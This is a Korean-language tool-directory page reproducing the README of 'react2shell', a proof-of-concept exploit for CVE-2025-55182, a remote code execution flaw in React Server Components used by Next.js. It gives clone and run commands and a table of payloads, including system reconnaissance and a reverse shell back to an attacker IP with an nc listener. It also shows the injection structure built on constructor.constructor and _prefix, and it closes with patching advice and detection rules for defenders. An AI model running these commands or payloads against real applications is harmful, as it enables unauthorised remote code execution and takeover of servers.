Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
react2shell — 취약점 CVE-2025-55182를 악용하기 위한 완전한 프레임워크 | Kitploit
도구/GitHubGitHub/zr0n/react2shell
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access ToolPayload Development
GitHubzr0n/react2shell

react2shell

취약점 CVE-2025-55182를 악용하기 위한 완전한 프레임워크

저장소 보기
10539개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

React2Shell - CVE-2025-55182 익스플로잇 PoC

Security Platform License

CVE-2025-55182에 대한 개념 증명 익스플로잇입니다. React Server Components를 사용하는 Next.js 애플리케이션의 치명적인 원격 코드 실행 취약점입니다.

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다.

  • ❌ 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 사용하지 마십시오.
  • ❌ 컴퓨터 시스템에 대한 무단 접근은 불법입니다.
  • ✅ 통제된 환경에서 학습 및 승인된 침투 테스트 용도로만 사용하십시오.
  • ✅ 작성자는 이 도구의 오용 또는 발생한 손해에 대해 책임을 지지 않습니다.

📋 취약점 세부 정보

  • CVE ID: CVE-2025-55182
  • 취약점 유형: React Server Components 원격 코드 실행
  • 영향을 받는 버전:
    • Next.js: ≥14.3.0-canary.77, App Router를 사용하는 모든 15.x 및 16.x 버전
    • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • 패치된 버전:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
    • React: 19.0.1, 19.1.2, 19.2.1
  • CVSS 점수: 치명적
  • 공격 경로: 네트워크 기반, 조작된 POST 요청 필요

🎯 기능

  • ✅ 교차 플랫폼 지원 (Windows & Linux)
  • ✅ 여러 페이로드 유형
  • ✅ 리버스 셸 기능
  • ✅ 시각적 증명 페이로드 (calc, notepad)
  • ✅ 파일 시스템 작업
  • ✅ 시스템 정보 수집

🔧 설치

root@kitploit:~
# 저장소 복제 또는 다운로드
git clone https://github.com/zr0n/react2shell
cd react2shell

# 의존성 설치
npm install form-data

💻 사용법

기본 구문

root@kitploit:~
node react2shell.js <target_url> <payload_type> [options]

사용 가능한 페이로드

페이로드설명예시
basic수학적 개념 증명 (7*7+1=50)node react2shell.js http://target:3000 basic
whoami현재 시스템 사용자 표시node react2shell.js http://target:3000 whoami
dir현재 디렉터리 내용 나열node react2shell.js http://target:3000 dir
systeminfo운영 체제 정보 표시node react2shell.js http://target:3000 systeminfo
fileEXPLOITED.txt 증명 파일 생성node react2shell.js http://target:3000 file
calc계산기 실행 (Windows 시각적 증명)node react2shell.js http://target:3000 calc
notepad메모장 실행 (Windows 시각적 증명)node react2shell.js http://target:3000 notepad
shell리버스 셸 (Windows/Linux 자동 감지)node react2shell.js http://target:3000 shell 10.10.10.5 4444

예시

1. 기본 개념 증명

root@kitploit:~
node react2shell.js http://localhost:3000 basic
# 서버 콘솔에서 출력 확인: EXPLOITED: 50

2. 시스템 정찰

root@kitploit:~
# 현재 사용자 확인
node react2shell.js http://localhost:3000 whoami

# 파일 목록
node react2shell.js http://localhost:3000 dir

# 시스템 정보
node react2shell.js http://localhost:3000 systeminfo

3. 시각적 증명 (Windows)

root@kitploit:~
# 계산기 실행
node react2shell.js http://localhost:3000 calc

# 메모장 실행
node react2shell.js http://localhost:3000 notepad

4. 파일 생성 증명

root@kitploit:~
node react2shell.js http://localhost:3000 file
# 서버 디렉터리에서 EXPLOITED.txt 확인

5. 리버스 셸

root@kitploit:~
# 터미널 1: 리스너 시작
nc -lvnp 4444

# 터미널 2: 익스플로잇 실행
node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444

# Windows (PowerShell) 및 Linux (Bash) 모두에서 작동

🏗️ 취약한 환경 설정

사전 요구 사항

  • Node.js 18+
  • npm 또는 yarn

취약한 Next.js 애플리케이션 생성

root@kitploit:~
# 프로젝트 디렉터리 생성
mkdir vulnerable-nextjs-app
cd vulnerable-nextjs-app

# 취약한 버전으로 Next.js 초기화
npx create-next-app@latest . --ts --app --no-eslint --tailwind

# 취약한 버전으로 다운그레이드
npm install [email protected]

# 의존성 설치
npm install

최소 취약 앱 (app/page.tsx)

root@kitploit:~
export default function Home() {
  return (
    <div className="p-8">
      <h1 className="text-4xl font-bold">취약한 Next.js 앱</h1>
      <p className="mt-4">이 앱은 CVE-2025-55182에 취약합니다</p>
    </div>
  );
}

서버 시작

root@kitploit:~
npm run dev
# 서버가 http://localhost:3000 에서 실행됩니다

🔍 작동 방식

이 익스플로잇은 React Server Components의 역직렬화 취약점을 활용합니다:

  1. 페이로드 구성: 프로토타입 오염이 포함된 악성 직렬화 객체 생성
  2. 함수 생성자 접근: constructor.constructor를 이용해 Function 생성자에 접근
  3. 코드 주입: _prefix 필드를 통해 임의 JavaScript 코드 주입
  4. 실행: 서버가 페이로드를 역직렬화하고 주입된 코드를 실행

기술적 세부 사항

root@kitploit:~
// 단순화된 취약점 체인
{
  _formData: {
    get: '$3:constructor:constructor' // Function 생성자 접근
  },
  _prefix: 'YOUR_CODE_HERE//' // 주입된 코드
}

🛡️ 완화 조치

애플리케이션 소유자용

  1. 즉시 업데이트:

    root@kitploit:~
    npm update next@latest
    npm update react@latest react-dom@latest
    
  2. 패치된 버전 확인:

    root@kitploit:~
    npm list next react
    
  3. 필수 버전:

    • Next.js: ≥16.0.7 또는 ≥15.5.7
    • React: ≥19.2.1 또는 ≥19.1.2

보안 팀용

  • 인프라에서 취약한 Next.js 버전 스캔
  • 악성 RSC 페이로드를 탐지하는 WAF(웹 애플리케이션 방화벽) 규칙 구현
  • next-action 헤더가 있는 의심스러운 POST 요청 모니터링
  • 예상치 못한 코드 실행 패턴에 대한 서버 측 로그 검토

📊 탐지

WAF 규칙

다음 조건의 POST 요청을 찾으십시오:

  • 헤더: next-action
  • Content-Type: multipart/form-data
  • 본문 포함: constructor, _prefix, _formData

로그 패턴

root@kitploit:~
POST / with next-action header
Suspicious FormData keys: 0, 1, 2, 3, 4
Response: 200 (성공적 익스플로잇) 또는 500 (실패)

📚 참고 자료

  • CVE-2025-55182 - NVD
  • Next.js 보안 권고
  • React 보안 업데이트
  • OWASP 코드 주입

🤝 기여

이 도구는 교육용입니다. 다음을 개선하는 기여를 환영합니다:

  • 탐지 기능
  • 문서화
  • 방어 전략
  • 교육 콘텐츠

공격 기능을 강화하는 기여는 제출하지 마십시오.

📜 라이선스

교육용으로만 사용 - 어떠한 보증도 제공하지 않음

👤 작성자

Luiz Fernando Ziron 사이버 보안 교육 및 인식 제고 목적으로 제작되었습니다.

⚖️ 법적 고지

이 도구를 사용함으로써 다음에 동의하는 것으로 간주됩니다:

  • 소유하거나 명시적 서면 테스트 허가를 받은 시스템에서만 사용
  • 자신의 행동에 대한 전적인 책임
  • 작성자를 오용이나 손해에 대해 책임 묻지 않음
  • 모든 관련 법률 및 규정 준수

컴퓨터 시스템에 대한 무단 접근은 대부분의 국가에서 범죄입니다.


안전하게, 윤리적으로, 합법적으로 행동하세요. 🔒

도구 다운로드